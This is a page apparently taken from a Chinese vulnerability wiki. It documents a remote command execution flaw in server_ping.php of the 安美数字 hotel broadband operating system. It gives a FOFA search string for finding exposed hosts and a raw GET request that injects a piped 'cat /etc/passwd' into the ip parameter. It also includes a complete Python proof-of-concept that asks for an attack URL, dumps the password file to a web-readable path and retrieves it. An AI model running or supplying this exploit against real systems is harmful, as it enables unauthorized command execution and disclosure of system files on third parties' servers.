Loading
0

安美数字 酒店宽带运营系统 server ping.php 远程命令执行漏洞

免费、自由、人人可编辑的漏洞库

,

FOFA

"酒店宽带运营"

漏洞利用

GET传入 $ip参数 后直接命令执行,并且文件无权限要求

请求包为:

GET /manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../pq.txt&id=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36

POC

#!/usr/bin/python3
#-*- coding:utf-8 -*-
# author : PeiQi
# from   : http://wiki.peiqi.tech

import base64
import requests
import random
import re
import json
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning

def title():
    print('+------------------------------------------')
    print('+  \03334mPOC_Des: http://wiki.peiqi.tech                                   \0330m')
    print('+  \03334mGithub : https://github.com/PeiQi0                                 \0330m')
    print('+  \03334m公众号  : PeiQi文库                                                   \0330m')
    print('+  \03334mVersion: 安美数字 酒店宽带运营系统 server_ping.php 远程命令执行漏洞            \0330m')
    print('+  \03336m使用格式:  python3 poc.py                                            \0330m')
    print('+  \03336mUrl         >>> http://xxx.xxx.xxx.xxx                             \0330m')
    print('+------------------------------------------')

def POC_1(target_url):
    vuln_url = target_url + "/manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../pq.txt&id=1"
    headers = {
                "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
                "Content-Type": "application/x-www-form-urlencoded",
    }
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=10)
        print("\03336mo 正在执行 cat /etc/passwd>../../pq.txt \0330m".format(target_url))
        if "parent" in response.text and response.status_code == 200:
            vuln_url = target_url + "/pq.txt"
            headers = {
                "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
                "Content-Type": "application/x-www-form-urlencoded",
            }
            response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=10)
            if "root:" in response.text:
                print("\03336mo 成功执行 cat /etc/passwd, 响应为:\n{} \0330m".format(response.text))
            else:
                print("\03331mx 请求失败:{} \0330m")
        else:
            print("\03331mx 请求失败 \0330m")
    except Exception as e:
        print("\03331mx 请求失败:{} \0330m".format(e))
        sys.exit(0)

#
if __name__ == '__main__':
    title()
    target_url = str(input("\03335mPlease input Attack Url\nUrl   >>> \0330m"))
    POC_1(target_url)

PWNWIK.COM==免费、自由、人人可编辑的漏洞库